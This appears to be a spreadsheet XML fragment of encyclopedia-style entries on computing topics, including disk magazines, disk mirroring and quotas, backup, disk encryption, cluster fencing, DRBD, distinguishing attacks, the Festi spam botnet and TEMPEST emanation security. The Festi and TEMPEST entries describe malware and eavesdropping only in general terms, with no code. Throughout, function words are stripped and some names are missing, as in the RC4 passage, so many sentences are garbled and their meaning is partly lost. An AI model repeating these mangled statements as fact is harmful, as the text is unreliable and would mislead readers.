scene warez scenes well. some commonly well known english diskmags include: hugi, imphobia, pain, scenial, daskmig (ibm pc), jurassic pack, raw, upstream, rom, seenpoint, generation (amiga), undercover magascene, chaos control digizine, maggie, diskmagazine, alive news (atari st). late 1990s, internet became popular among general public, effect killing market disk-based publications people could access sorts material net. result, disk-based periodicals became uncommon, publishers electronic magazines preferred e-mail distribution medium. demoscene magazines based executable program files still commonly called diskmags, although seldom distributed physical disks more. bulletin board systems internet took major distribution channels magazines already 1990s. 2000s occasional dvd-based multimedia magazine come since 2000, though often promotional gimmick self-sustaining publication. more effort lately gone creating promoting sites, ezines, blogs, e-mail lists physical-medium-based publications. some publications termed "diskmags" today distributed internet (ftp, www, irc, etc.). former entertainment disk magazine launch transformed online video site launchcast, owned yahoo!. blender also began life cd-rom diskmag us-wide distribution. later transitioned print. however, popularity tablet computers portable e-book readers, print publications transitioning electronic form, all-electronic publications starting longest-lasting disk magazine surprisingly enough, long-obsolete commodore computer; loadstar, originally published softdisk starting 1984, later independent company, continued publishing well 2000s "cult following" commodore buffs. types content disk magazines differed sorts material emphasised. several distinct sorts things could published electronic periodical, different ones might content another categories: "static" articles similar paper magazines, including text illustrations (though, that's present publication, usually termed "e-zine" "ascii-zine" rather "disk magazine") multimedia features video audio interactive features quizzes surveys. cases could send disks back publisher responses feedback could published later issue, making (rather slow) user forum. software could install; either original software created staff freelancers specifically publication usable unrestrictedly subscribers, copies freeware, shareware, "crippleware" might limited functionality unless customer pays registered copy files add-ons used software, clip art, sound clips, fonts. also list disk magazines references external links ready-to-run magazines descriptions reviews early disk magazines including cursor, microzine, cload, window internet archive: disk magazines archive.org diskmags collection</t>
  </si>
  <si>
    <t>Disk mirroring</t>
  </si>
  <si>
    <t>data storage, disk mirroring replication logical disk volumes onto separate physical hard disks real time ensure continuous availability. commonly used raid mirrored volume complete logical representation separate volume copies. disaster recovery context, mirroring data long distance referred storage replication. depending technologies used, replication performed synchronously, asynchronously, semi-synchronously, point-in-time. replication enabled microcode disk array controller server software. typically proprietary solution, compatible various data storage device vendors. mirroring typically synchronous. synchronous writing typically achieves recovery point objective (rpo) zero lost data. asynchronous replication achieve seconds remaining methodologies provide minutes perhaps several hours. disk mirroring differs file shadowing operates file level, disk snapshots data images never re-synced origins. overview recognized disks inherently unreliable component computer systems. mirroring technique allow system automatically maintain multiple copies, dual backup (meaning data redundant hard drives exist mirror) data event disk hardware failure system continue process quickly recover data. mirroring done locally specifically cater disk unreliability, done remotely forms part sophisticated disaster recovery scheme, done locally remotely, especially high availability systems. normally data mirrored onto physically identical drives, though process applied logical drives underlying physical format hidden mirroring process. typically, mirroring provided either hardware solutions disk arrays, software within operating system (such linux mdadm device mapper). additionally, file systems like btrfs provide integrated data mirroring. there additional benefits btrfs zfs, maintain data metadata integrity checksums, making capable detecting copies blocks, using mirrored data pull data correct blocks.there several scenarios happens disk fails. swap system, event disk failure, system typically diagnoses disk failure signals failure. sophisticated systems automatically activate standby disk remaining active disk copy live data onto disk. alternatively, disk installed data copied less sophisticated systems, system operated remaining disk spare disk installed. copying data side mirror pair another called rebuilding less commonly, resilvering.mirroring performed site site either rapid data links, example fibre optic links, distances maintain adequate performance support real-time mirroring. longer distances slower links maintain mirrors using asynchronous copying system. remote disaster recovery systems, mirroring done integrated systems simply additional applications primary secondary machines. additional benefits addition providing additional copy data purpose redundancy case hardware failure, disk mirroring allow disk accessed separately reading purposes. under certain circumstances, significantly improve performance system choose read disk seek quickly required data. this especially significant several tasks competing data disk, thrashing (where switching tasks takes time task itself) reduced. this important consideration hardware configurations frequently access data disk. implementations, mirrored disk split used data backup, allowing first disk remain active. however merging disks require synchronization period write activity occurred mirrored disk. other schemes some mirroring schemes employ three disks, disks redundancy mirroring third split performing backups. nomenclature, third disks called business continuance volumes (bcvs). also disk cloning distributed replicated block device (drbd) mirror site stable storage references</t>
  </si>
  <si>
    <t>Disk quota</t>
  </si>
  <si>
    <t>disk quota limit system administrator restricts certain aspects file system usage modern operating systems. function using disk quotas allocate limited disk space reasonable way. types quotas there basic types disk quotas. first, known usage quota block quota, limits amount disk space used. second, known file quota inode quota, limits number files directories created. addition, administrators usually define warning level, soft quota, users informed nearing limit, less effective limit, hard quota. there also small grace interval, allows users temporarily violate quotas certain amounts necessary. quotas disk quotas typically implemented per-user per-group basis. that system administrator defines usage file quota specific certain user group. filesystems (e.g. ext4, xfs, f2fs, zfs, lustre) also possible also define block inode quota limits particular project directory, adding project files directory tree defining quota limits project administrator prevent user consuming entire file system's resources, create system tiered access, whereby users different levels restriction. this used, example, hosting companies provide different levels service based upon needs means individual clients. cases, quotas also specific individual file systems. should administrator want limit usage specific user file systems, separate quota would specified each. when soft quota violated, system normally sends user (and sometimes administrator well) sort message. action typically taken. some systems prevent disk write operations would result hard quota violations completing successfully, others wait quota physically violated denying write requests. user typically notified failed write operation error messages generated violating applications, administrator almost always sent notification well. disk quotas supported modern operating systems, including unix-like systems, (using jfs2 filesystem), linux (using ext3, ext4, ext2, (integrated support) among filesystems), solaris (using zfs), microsoft windows starting windows 2000, novell netware, vms, others. method administration disk quotas varies operating systems. unix-like systems typically provide quota command administration monitoring; graphical front-ends command also used. unix unix-like operating systems frequently feature grace period users exceed quota limits brief period time. windows 2000 newer versions "quota" disk properties dialog. other systems provide quota management utilities. common unix disk quota utilities quota display user's file system disk quota usage; edquota edit user quotas file system; setquota disk quotas file system; repquota summarize quotas file system; quotacheck file system quota consistency checker; quotaon turn file system quotas off; /etc/fstab (linux) /etc/vfstab (solaris) list default parameters file system including quota status. also file system external links disk quota system overview, solaris disk quota tutorial. linux diskquota homepage</t>
  </si>
  <si>
    <t>Disk staging</t>
  </si>
  <si>
    <t>disk staging using disks additional, temporary stage backup process finally storing backup tape. backups stay disk typically week, copied tape background process deleted afterwards. process disk staging controlled software performs actual backups, different virtual tape library intermediate disk usage hidden main backup software. both techniques known d2d2t (disk-to-disk-to-tape). restoring data data restored disk possible. data exists tape restored directly backward-staging restore). reasons reasons behind using d2d2t: increase performance small, random-access restores: disk much faster random access tape increase overall backup/restore performance: although disk tape similar streaming throughput, easily scale disk throughput means striping (and tape-striping much less established technique) increase utilization tape drives: tape shoe-shining effect eliminated staging (note still happen tape restores) also backup virtual tape library references</t>
  </si>
  <si>
    <t>Disk-based backup</t>
  </si>
  <si>
    <t>disk-based backup refers technology allows back large amounts data disk storage unit. technology often supplemented tape drives data archival replication another facility disaster recovery. additionally, backup-to-disk several advantages traditional tape backup technical business reasons. with continued improvements storage devices provide faster access higher storage capacity, prime consideration backup restore operations, backup-to-disk become prominent organizations. technical advantanges there technical advantages backup-to-disk technology. main advantages speed backups performed disk appliance. backing data backup-to-disk technology four times faster traditional scsi tape devices. while serial attached scsi (sas) connected tape drives faster original tape drives, disk appliance still faster tape technologies. these faster backup times lead shorter backup windows allowing technology backup data smaller amount time thus increasing window processing also benefit business.another advantage backup-to-disk offers data de-duplication compression. disk appliances offer either de-duplication source destination. de-duplication destination faster requires less performance overhead source host. de-duplication requires less disk space disk appliance stores copy possible multiple copies file network. many backup-to-disk technologies advertise compression ratios. this also allows information technology department store data less disk space. with de-duplication disk appliance terabytes disk space store much terabytes compressed de-duplicated data. business advantages disaster recovery important advantage backup-to-disk provides business, technology department, faster recovery data. most businesses today several terabytes data business must able retain event disaster. this disaster simple server hardware failures severe regional disaster, natural disaster. localized disaster disk appliance allows technology department hold weeks backups, depending size disk appliance amount data backup, allows quick recovery. business continuity preparation disaster requires creation organizational business continuity plan (bcp). describes guidelines system continuity recoverability. disk based back-ups facilitate rapid system recovery. backup-to-disk system replicate data backups device another location. this beneficial organization designated location recovery site. backup-to-disk technology greatly benefit organization continuing business disaster damages facilities technology. products there several disk backup solutions market today. below industry leading devices. dell dell offers disk backup devices. data domain device, acquired data domain 2009. data domain device de-duplicates data destination, reduces overhead host. with throughput tb/hour, data domain systems make possible complete backups less time provide faster, reliable restores. data domain operating system intelligence behind data domain systems makes industry’s reliable cloud-enabled protection storage. second dell offering avamar: unit de-duplicates data source agent host offers savings bandwidth utilization backup.both units offer site-to-site replication. hewlett packard enterprise(hpe) offers data storage backup storeonce portfolio. storeonce offered virtual storage appliance (vsa) disk based hardware appliance. storeonce licensed capacity points deployed industry standard server certain specification requirements. disk based storeonce backup appliances models ranging storeonce 3100 (5.5tb usable) storeonce 6500 (1.7pb usable).hpe storeonce storeonce catalyst federated deduplication solution, provides disk-based backup environments, smallest remote sites largest enterprises. reduce amount space needed store backup data choose powerful dedicated appliances larger offices data centers, flexible virtual appliances smaller remote offices. quantum quantum offers several models disk backup solutions. dxi-v series entry-level unit stores 1-2tb data. midrange level units dxi4000 dxi6000series, enterprise level unit dxi8500. offerings quantum de-duplication, compression, remote site replication. rdiff-backup rdiff-backup open source product provides reverse-delta disk-to-disk backups. rsync-incremental rsync-incremental product rather technique using open source program rsync the—link-dest parameter. this functionality similar time machine macos. time machine macos, time machine provides disk-to-disk backup solution create incremental backups files restored later dates. also backup disk-to-disk-to-tape disk storage references 10.jump storage product marketing. storeonce backup". retrieved 2014. &lt;http://www8.hp.com/h20195/v2/getdocument.aspx&gt;</t>
  </si>
  <si>
    <t>Stockade (software)</t>
  </si>
  <si>
    <t>stockade tcp-layer blocking tool written c++. denies tcp/ip access registered addresses using ipfw packet filter. targets spam prevention, also used attackers (e.g. brute force password crackers.) rate limiting approach this approach leverages superior determination exhibited legitimate senders. respect, considered similar greylisting. originally, authors conceived proxy rate-limit smtp connections messages believed spam. that worked adding dummynet rule frequent senders sending messages triggered unreliable statistical analysis.a limitation original scheme consumption local resources smtp proxy). stockade approach introduces notion inbound connection rejected random probability proportional level spam already seen connection’s originator configurable period time. that probability subject decay, configured halving time period, address eventually rehabilitated. that way, stockade provides fully automatic spam mitigation. also implements similar random blocking approach using linux's iptables. fail2ban generic intrusion prevention system, featuring multiple blocking techniques preconfigured variety server applications. denyhosts similar tool, specific thwarting server attacks. references</t>
  </si>
  <si>
    <t>DiskCryptor</t>
  </si>
  <si>
    <t>diskcryptor free open-source full disk encryption system microsoft windows. allows encryption pc's entire hard drive individual partitions. also includes ability encrypt partition disk installed.diskcryptor originally designed replace commercial disk encryption systems drivecrypt plus pack whole disk encryption, uses either aes-256, twofish, serpent combination cascaded algorithms mode carry encryption. project originally started former truecrypt user forum member goes name 'ntldr' (anonymous). according developer, originally fully compatible truecrypt's container format used corresponding partition format encrypted data aes-256 algorithm mode. however, according software's website, since improved format allow data-in-place encryption windows allow system partition exactly format non-system partitions support future project plans. after original truecrypt discontinued, diskcryptor alternative updated long time, since 2020 development restarted. notable changes ability boot uefi environment disks. other alternatives appeared, notably source-available project veracrypt (based original truecrypt source code). however, diskcryptor efficient faster, mostly noticeable nvme storage devices. program features support encryption algorithm aes, twofish, serpent, including combinations. transparent encryption disk partitions. full support dynamic disks. support disk devices large sector size (important hardware raid operation). performance claimed comparable efficiency non-encrypted system. support hardware acceleration: instruction recent intel cpus; padlock extensions processors. support trim extension broad choice configuration booting encrypted support various multi-boot options. full compatibility third party boot loaders (lilo, grub, etc.). full compatibility uefi/gpt boot encryption system bootable partitions pre-boot authentication. option place boot loader external medium authenticate using medium. support files. full support external storage devices. option create encrypted dvds. full support encryption external storage devices. automatic mounting disk partitions external storage devices. support hotkeys optional command-line interface (cli). open license gplv3.for limitations current version, well technical information, official website archived august 2018 wayback machine. encryption algorithms aes-256 serpent twofishall algorithms implemented mode. hash function hmac-sha-512 performance with modern computer system hardware accelerated calculations, diskcryptor nearly native write/read performance multi gb/s range even fast modern storage devices like nvme. intel core quad (q6600) data encryption speed amounts mb/s core. crypto-algorithms version implemented assembly language, implementation maximum number optimizations intel core line processors, however performs sufficiently fast processor well. almost possible enhancements improve performance applied algorithm code dynamically generated optimization made usage particular key. supported also comparison disk encryption software disk encryption references external links official website download forum</t>
  </si>
  <si>
    <t>FOG Project</t>
  </si>
  <si>
    <t>project software project implements (free open-source ghost), software tool deploy disk images microsoft windows linux using preboot execution environment. makes tftp, apache webserver ipxe. written php.the configuration tool developed project makes possible remote system administration computers network. depends partclone copy disk image. also windows deployment services clonezilla references external links official website</t>
  </si>
  <si>
    <t>Festi</t>
  </si>
  <si>
    <t>festi rootkit botnet created basis. works operating systems windows family. autumn 2009 first time festi came view companies engaged development sale antivirus software. time estimated botnet consisted roughly 25.000 infected machines, spam volume capacity roughly billion spam emails day. festi showed greatest activity 2011-2012. more recent estimates dated august 2012 display botnet sending spam 250,000 unique addresses, quarter total amount million detected ip's sending spam mails. main functionality botnet festi spam sending implementation cyberattacks like "distributed denial service". distribution methods distribution carried scheme (pay-per-install) use. preventing detection antiviruses loader extends ciphered complicates signature based detection. architecture represented data architecture botnet gathered research eset antivirus company. loader downloads sets represents kernel-mode driver adds list drivers launching together operating system. hard disk drive part stored responsible communication command center loading modules. after starting periodically asks command center receiving configuration, loading modules jobs necessary execution. modules from researches carried specialists antivirus company eset, known festi least modules. intends spam sending (botspam.dll), another implementation cyberattacks like "distributed denial service" (botdos.dll). module implementation cyberattacks like "distributed denial service" supports following types cyberattacks, namely: tcp-flood, udp-flood, dns-flood, http(s)-flood, also flood packets random number issue used protocol. expert "kaspersky lab" researching botnet drew output modules, used. their list includes module socks-server implementation (botsocks.dll) protocols, module remote viewing control computer user (botremote.dll), module implementing search disk remote computer local area network (botsearch.dll) remote computer connected, grabber-modules browsers known present time (botgrabber.dll). modules never saved hard disk drive almost impossible detection. network interaction uses client-server model functioning implements protocol network interaction command center used receiving configuration botnet, loading modules, also obtaining jobs command center notification command center execution. data encoded interferes determination contents network traffic. protection detection debugging case installation switches system firewall, hides kernel-mode driver keys system registry necessary loading operation, protects registry keys deleting. operation network occurs level allows bypass network filters antivirus software easily. network filters observed prevent installation. checks, whether launched virtual machine, case positive result check, stops activities. festi periodically checks existence debugger able remove breakpoints. object-oriented approach development festi created object-oriented technology software development strongly complicates researches method reverse engineering easily ported operating systems. control control botnet festi implemented means interface carried browser. stands behind festi according specialists antivirus company eset, american journalist blogger brian krebs, expert information security field, according american journalist york times newspaper andrew kramer, also sources close russian intelligence services, architect developer botnet festi russian hacker igor artimovich. conclusion conclusion, possible tell botnet festi powerful botnets sending spam carrying attacks like "distributed denial service". principles festi botnet constructed increase lifetime system much possible, hinder detection antivirus software network filters. mechanism modules allows expand functionality botnet side means creation loading necessary modules achievement different purposes, object-oriented approach development complicates botnet researching methods reverse engineering gives chance porting operating systems accurate demarcation specific concrete operating system functionality remaining logic bot. powerful systems counteraction detection debugging make festi almost invisible stealthy. system bindings reserve command centers gives chance restoration control botnet change command center. festi atypical example malicious software authors approached process development extremely seriously. also botnets malware cyberwarfare references external links botnets impact, december 2009, botnets impact, help security 'most wanted' spam-spewing botnets rustock, mega-d, festi, pushdo among worst botnet offenders, july 2010, ellen messmer, network world botnets, white paper festi botnet takes following grum shutdown, august 2012, computerworld spam botnets: fall grum rise festi, august 2012, thomas morrison, spamhaus spamhaus: grum dead, festi alive well august 2012, malcolm james, spammed global botnet threat, november 2012, macafee</t>
  </si>
  <si>
    <t>Fencing (computing)</t>
  </si>
  <si>
    <t>fencing process isolating node computer cluster protecting shared resources node appears malfunctioning.as number nodes cluster increases, likelihood fail point. failed node control shared resources need reclaimed node acting erratically, rest system needs protected. fencing thus either disable node, disallow shared storage access, thus ensuring data integrity. basic concepts node fence fence) virtual "fence" separates nodes must access shared resource resource. separate active node backup. backup crosses fence and, example, tries control disk array primary, data hazard occur. mechanisms stonith designed prevent condition. isolating node means ensuring longer done fencing typically done automatically, cluster infrastructure shared disk file systems, order protect processes active nodes modifying resources node failures. mechanisms support fencing, reserve/release mechanism scsi, existed since least 1985.fencing required impossible distinguish real failure temporary hang. malfunctioning node really down, cannot damage, theoretically action would required could simply brought back cluster usual join process). however, possibility malfunctioning node could consider rest cluster malfunctioning, split brain condition could ensue, cause data corruption. instead, system assume worst scenario always fence case problems. approaches fencing there classes fencing methods, disables node itself, disallows access resources shared disks. cases, assumed node respond given time-threshold assumed non-operational, although counterexamples, e.g. long paging rampage.the stonith method stands "shoot other node head", meaning suspected node disabled powered off. instance, power fencing uses power controller turn inoperable node. node restart join cluster later. however, approaches operator informed need manual restart node.the resources fencing approach disallows access resources without powering node. this include: persistent reservation fencing uses scsi3 persistent reservations block access shared storage. fibre channel fencing disables fibre channel port global network block device (gnbd) fencing disables access gnbd serverwhen cluster nodes, reserve/release method used node stonith whereby upon detecting node 'failed', node issue reserve obtain resources (e.g. shared disk) itself. node disabled tries case temporarily hung). node failure triggers code kill node. persistent reservation essentially match key, node right i/o, otherwise fails. therefore, sufficient change failure ensure right behavior failure. however, always possible change failed node. stonith easier simpler method implement multiple clusters, various approaches resources fencing require specific implementation approaches cluster implementation. also fault tolerance failover references external links 6.0: administrator's guide using fencing system ocfs2 quorum fencing</t>
  </si>
  <si>
    <t>Distinguishing attack</t>
  </si>
  <si>
    <t>cryptography, distinguishing attack form cryptanalysis data encrypted cipher allows attacker distinguish encrypted data random data. modern symmetric-key ciphers specifically designed immune attack. words, modern encryption schemes pseudorandom permutations designed ciphertext indistinguishability. algorithm found distinguish output random faster brute force search, considered break cipher. similar concept known-key distinguishing attack, whereby attacker knows find structural property cipher, transformation plaintext ciphertext random. overview prove cryptographic function safe, often compared random oracle. function would random oracle, attacker able predict output function. function distinguishable random oracle, non-random properties. that exists relation different outputs, input output, used attacker example find part input. example sequence random bits, generated random oracle sequence generated pseudo-random generator. parties encryption system encrypt message length bitwise next bits respectively. output encryption using truly random. sequence cannot distinguished output encryption appear random well. sequence distinguishable, encryption reveal information systems said indistinguishable exists algorithm connected either able decide whether connected distinguishing attack given algorithm broadly attack attacker given black containing either instance system attack unknown key, random object domain system aims emulate, algorithm able tell whether system random object black box, attack. example, distinguishing attack stream cipher might determines whether given stream bytes random generated unknown key. examples classic examples distinguishing attack popular stream cipher itsik mantin shamir showed output byte heavily biased toward zero. another example, souradyuti paul bart preneel cosic shown value outputs also non-uniform. significantly, theoretical biases demonstrable computer simulation. also randomness test references external links source indifferentiability</t>
  </si>
  <si>
    <t>Distributed Replicated Block Device</t>
  </si>
  <si>
    <t>drbd distributed replicated storage system linux platform. implemented kernel driver, several userspace management applications, shell scripts. drbd traditionally used high availability (ha) computer clusters, beginning drbd version also used create larger software defined storage pools focus cloud integration.a drbd device drbd block device refers logical block device logical volume schema. drbd software free software released terms general public license version drbd part lisog open source stack initiative. mode operation drbd layers logical block devices (conventionally named /dev/drbdx, device minor number) existing local block devices participating cluster nodes. writes primary node transferred lower-level block device simultaneously propagated secondary node(s). secondary node(s) transfers data corresponding lower-level block device. read performed locally unless read-balancing configured.should primary node fail, cluster management process promotes secondary node primary state. this transition require subsequent verification integrity file system stacked drbd, filesystem check journal replay. when failed ex-primary node returns, system not) raise primary level again, device data resynchronization. drbd's synchronization algorithm efficient sense blocks changed outage must resynchronized, rather device entirety. drbd often deployed together pacemaker heartbeat cluster resource managers, although integrate cluster management frameworks. integrates virtualization solutions xen, used linux stack.drbd allows load-balancing configurations, allowing nodes access particular drbd read/write mode shared storage semantics. multiple primary (multiple read/write nodes) configuration requires distributed lock manager. shared cluster storage comparison conventional computer cluster systems typically sort shared storage data used cluster resources. this approach number disadvantages, drbd help offset: shared storage resources must typically accessed storage area network network attached storage server, creates overhead read i/o. drbd overhead reduced read operations carried locally. shared storage usually expensive consumes space more) power. drbd allows setup machines. shared storage necessarily highly available. example, single storage area network accessed multiple virtualization hosts considered shared storage, considered highly available storage level single storage area network fails, neither host within cluster access shared storage. drbd allows storage target shared highly available.a disadvantage lower time required write directly shared storage device route write node. comparison raid-1 drbd bears superficial similarity raid-1 involves copy data storage devices, fails, data used. however, operates different raid even network raid. raid, redundancy exists layer transparent storage-using application. while storage devices, instance application application aware multiple copies. when application reads, raid layer chooses storage device read. when storage device fails, raid layer chooses read other, without application instance knowing failure. contrast, drbd instances application, read storage devices. should storage device fail, application instance tied device longer read data. consequently, case application instance shuts application instance, tied surviving copy data, takes over. conversely, raid, single application instance fails, information storage devices effectively unusable, drbd, application instance take over. applications operating within linux kernel's block layer, drbd essentially workload agnostic. drbd used basis conventional file system (this canonical example), shared disk file system gfs2 ocfs2, another logical block device used lvm, example), application requiring direct access block device.drbd-based clusters often employed adding synchronous replication high availability file servers, relational databases (such mysql), many workloads. inclusion linux kernel drbd's authors originally submitted software linux kernel community july 2007, possible inclusion canonical kernel.org version linux kernel. after lengthy review several discussions, linus torvalds agreed drbd part official linux kernel. drbd merged december 2009 "merge window" linux kernel version 2.6.33. also highly available storage high-availability cluster disk mirroring references external links official website linbit high-availability linux project site</t>
  </si>
  <si>
    <t>Tempest (codename)</t>
  </si>
  <si>
    <t>tempest u.s. national security agency specification nato certification referring spying information systems leaking emanations, including unintentional radio electrical signals, sounds, vibrations. tempest covers methods upon others shield equipment spying. protection efforts also known emission security (emsec), subset communications security (comsec).the methods spying computer emissions classified, protection standards released either department defense. protecting equipment spying done distance, shielding, filtering, masking. tempest standards mandate elements equipment distance walls, amount shielding buildings equipment, distance separating wires carrying classified unclassified materials, filters cables, even distance shielding wires equipment building pipes. noise also protect information masking actual data. while much tempest leaking electromagnetic emanations, also encompasses sounds mechanical vibrations. example, possible user's keystrokes using motion sensor inside smartphones. compromising emissions defined unintentional intelligence-bearing signals which, intercepted analyzed (side-channel attack), disclose information transmitted, received, handled, otherwise processed information-processing equipment. history during world bell telephone supplied u.s. military 131-b2 mixer device encrypted teleprinter signals xor’ing material one-time tapes (the sigtot system) earlier, rotor-based generator called sigcum. used electromechanical relays operation. later bell informed signal corps able detect electromagnetic spikes distance mixer recover plain text. meeting skepticism whether phenomenon discovered laboratory could really dangerous, demonstrated ability recover plain text signal corps’ crypto center varick street lower manhattan. alarmed, signal corps asked bell investigate further. bell identified three problem areas: radiated signals, signals conducted wires extending facility, magnetic fields. possible solutions, suggested shielding, filtering masking. bell developed modified mixer, 131-a1 shielding filtering, proved difficult maintain expensive deploy. instead, relevant commanders warned problem advised control -diameter zone around communications center prevent covert interception, things left that. then 1951, rediscovered problem 131-b2 mixer found could recover plain text line carrying encrypted signal quarter-mile away. filters signal power lines developed, recommended control-perimeter radius extended feet based commanders could expected accomplish technical criteria. long process evaluating systems developing possible solutions followed. other compromising effects discovered, fluctuations power line rotors stepped. question exploiting noise electromechanical encryption systems raised late 1940s, re-evaluated possible threat. acoustical emanations could reveal plain text, pick-up device close source. nevertheless, even mediocre microphones would soundproofing room made problem worse removing reflections providing cleaner signal recorder. 1956, naval research laboratory developed better mixer operated much lower voltages currents therefore radiated less. incorporated newer encryption systems. however, many users needed higher signal levels drive teleprinters greater distances multiple teleprinters connected, newer encryption devices included option switch signal back higher strength. began developing techniques specifications isolating sensitive-communications pathways filtering, shielding, grounding, physical separation: lines carried sensitive plain text intended carry non-sensitive data, latter often extending outside secure environment. this separation effort became known red/black concept. 1958 joint policy called nag-1 radiation standards equipment installations based limit control. also specified classification levels various aspects tempest problem. policy adopted canada next year. organizations, navy, army, force, nsa, cia, state department provide bulk effort implementation. difficulties quickly emerged. computerization becoming important processing intelligence data, computers peripherals evaluated, wherein many evidenced vulnerabilities. friden flexowriter, popular typewriter time, proved among strongest emitters, readable distances 3,200 (about field tests. u.s. communications security board (uscsb) produced flexowriter policy banned overseas classified information limited within u.s. confidential level, within (120 security zone users found policy onerous impractical. later, found similar problems introduction cathode-ray-tube displays (crts), also powerful radiators. there multi-year process moving policy recommendations strictly enforced tempest rules. resulting directive 5200.19, coordinated separate agencies, signed secretary defense robert mcnamara december 1964, still took months fully implement. nsa’s formal implementation took effect june 1966. meanwhile, problem acoustic emanations became critical discovery microphones u.s. installations overseas, behind iron curtain. response build room-within-a-room enclosures, transparent, nicknamed "fish bowls". other units fully shielded contain electronic emanations, unpopular personnel supposed work inside; called enclosures "meat lockers", sometimes left doors open. nonetheless, installed critical locations, embassy moscow, installed: state-department military attachés. unit installed key-generation equipment cost $134,000. tempest standards continued evolve 1970s later, newer testing methods more-nuanced guidelines took account risks specific locations situations.: now, security needs often resistance. according nsa's david boak, "some still hear today circles, rigorous technical standards whittled interest money time, frighteningly reminiscent arrogant third reich enigma cryptomachine." ibid shielding standards many specifics tempest standards classified, elements public. current united states nato tempest standards define three levels protection requirements: nato sdip-27 level (formerly amsg 720b) nstissam level i"compromising emanations laboratory test standard" this strictest standard devices operated nato zone environments, assumed attacker almost immediate access (e.g. neighbouring room, metre; distance).nato sdip-27 level (formerly amsg 788a) nstissam level ii"laboratory test standard protected facility equipment" this slightly relaxed standard devices operated nato zone environments, assumed attacker cannot closer metres (65') building materials ensure attenuation equivalent free-space attenuation distance).nato sdip-27 level (formerly amsg 784) nstissam level iii"laboratory test standard tactical mobile equipment/systems" even relaxed standard devices operated nato zone environments, attackers deal equivalent metres (300') free-space attenuation equivalent attenuation building materials).additional standards include: nato sdip-29 (formerly amsg 719g)"installation electrical equipment processing classified information" this standard defines installation requirements, example respect grounding cable distances.amsg 799b"nato zoning procedures" defines attenuation measurement procedure, according individual rooms within security perimeter classified zone zone zone zone determines shielding test standard required equipment processes secret data rooms.the department defense declassified tempest elements freedom information requests, documents black many values descriptions. declassified version tempest test standard heavily redacted, emanation limits test procedures blacked out. redacted version introductory tempest handbook nacsim 5000 publicly released december 2000. additionally, current nato standard sdip-27 (before 2006 known amsg 720b, amsg 788a, amsg 784) still classified. despite this, declassified documents give information shielding required tempest standards. example, military handbook 1195 includes chart right, showing electromagnetic shielding requirements different frequencies. declassified specification shielded enclosures offers similar shielding values, requiring, minimum insertion loss ghz." since much current requirements still classified, publicly available correlations shielding requirement newer zone-based shielding standards. addition, many separation distance requirements elements provided declassified red-black installation guidance, nstissam tempest/2-95. certification information-security agencies several nato countries publish lists accredited testing labs equipment passed tests: canada: canadian industrial tempest program germany: german zoned products list cesg directory infosec assured products, section u.s.: tempest certification programthe united states army also tempest testing facility, part u.s. army information systems engineering command, fort huachuca, arizona. similar lists facilities exist nato countries. tempest certification must apply entire systems, individual components, since connecting single unshielded component (such cable device) otherwise secure system could dramatically alter system characteristics. red/black separation tempest standards require "red/black separation", i.e., maintaining distance installing shielding circuits equipment used handle plaintext classified sensitive information encrypted (red) secured circuits equipment (black), latter including carrying encrypted signals. manufacture tempest-approved equipment must done careful quality control ensure additional units built exactly units tested. changing even single wire invalidate tests. correlated emanations aspect tempest testing distinguishes limits spurious emissions (e.g., part requirement absolute minimal correlation radiated energy detectable emissions plaintext data processed. public research 1985, published first unclassified technical analysis security risks emanations computer monitors. this paper caused consternation security community, previously believed monitoring highly sophisticated attack available governments; successfully eavesdropped real system, range hundreds metres, using worth equipment plus television set. consequence research, emanations sometimes called "van radiation", eavesdropping technique phreaking, although government researchers already aware danger, bell labs noted vulnerability secure teleprinter communications world able produce plaintext processed secure facility distance feet. metres) additionally published tempest fundamentals, nsa-82-89, nacsim 5000, national security agency (classified) february 1982. addition, technique successfully demonstrated non-tempest personnel korea korean 1950s.markus kuhn discovered several low-cost techniques reducing chances emanations computer displays monitored remotely. with displays analog video cables, filtering high-frequency components fonts rendering computer screen attenuate energy text characters broadcast. with modern flat panel displays, high-speed digital serial interface (dvi) cables graphics controller main source compromising emanations. adding random noise least significant bits pixel values render emanations flat-panel displays unintelligible eavesdroppers secure method. since uses certain code scheme tries transport balanced signal bits bits, much difference pixel colors differ much color intensity. emanations differ drastically even last pixel's color changed. signal received eavesdropper also depends frequency emanations detected. signal received many frequencies frequency's signal differs contrast brightness related certain color screen. usually, technique smothering signal noise effective unless power noise sufficient drive eavesdropper's receiver saturation thus overwhelming receiver input. indicators computer equipment source compromising optical emanations. technique involves monitoring lights dial-up modem. almost modems flash show activity, common flashes directly taken data line. such, fast optical system easily changes flickers data transmitted wire. recent research shown possible detect radiation corresponding keypress event wireless (radio) keyboards, also traditional wired keyboards, even laptop keyboards. from 1970s onward, soviet bugging embassy selectric typewriters allowed keypress-derived mechanical motion bails, attached magnets, detected implanted magnetometers, converted hidden electronics digital radio frequency signal. each eight character transmission provided soviet access sensitive documents, typed, facilities moscow leningrad.in 2014, researchers introduced "airhopper", bifurcated attack pattern showing feasibility data exfiltration isolated computer nearby mobile phone, using frequency signals.in 2015, "bitwhisper", covert signaling channel air-gapped computers using thermal manipulations introduced. "bitwhisper" supports bidirectional communication requires additional dedicated peripheral hardware. later 2015, researchers introduced gsmem, method exfiltrating data air-gapped computers cellular frequencies. transmission generated standard internal renders computer small cellular transmitter antenna. february 2018, research published describing frequency magnetic fields used escape sensitive data faraday-caged, air-gapped computers malware code-named ’odini’ control frequency magnetic fields emitted infected computers regulating load cores.in 2018, class side-channel attack introduced black eurecom's researchers: "screaming channels". this kind attack targets mix-signal chips containing analog digital circuit silicon radio transmitter. results architecture, often found connected objects, digital part chip leak metadata computations analog part, leads metadata's leak encoded noise radio transmission. thanks signal-processing techniques, researchers able extract cryptographic keys used communication decrypt content. this attack class supposed, authors, already known since many years governmental intelligence agencies. popular culture television series numb3rs, season episode "sacrifice", wire connected high gain antenna used "read" computer monitor. television series spooks, season episode "the sting", failed attempt read information computer network link described. novel cryptonomicon neal stephenson, characters phreaking likewise read information computer monitor neighboring room. television series agents s.h.i.e.l.d., season episode "ragtag", office scanned digital signatures spectrum. video game clancy's splinter cell: chaos theory, part final mission involves spying meeting tempest-hardened room. throughout entire splinter cell series, laser microphone used well. video game rainbow six: siege, operator mute experience tempest specifications. designed signal disrupter initially ensure hidden microphones sensitive meetings would transmit, adapted combat, capable disrupting remotely activated devices like breaching charges. novel series laundry files charles stross, character james angleton (high ranking officer ultra-secret intelligence agency) always uses tech devices typewriter memex defend tempest (despite building tempest-shielded). also (networking) gaps breached tempest-like techniques computer network surveillance computer security echelon mil-std-461 side-channel attack references sources</t>
  </si>
  <si>
    <t>Feistel cipher</t>
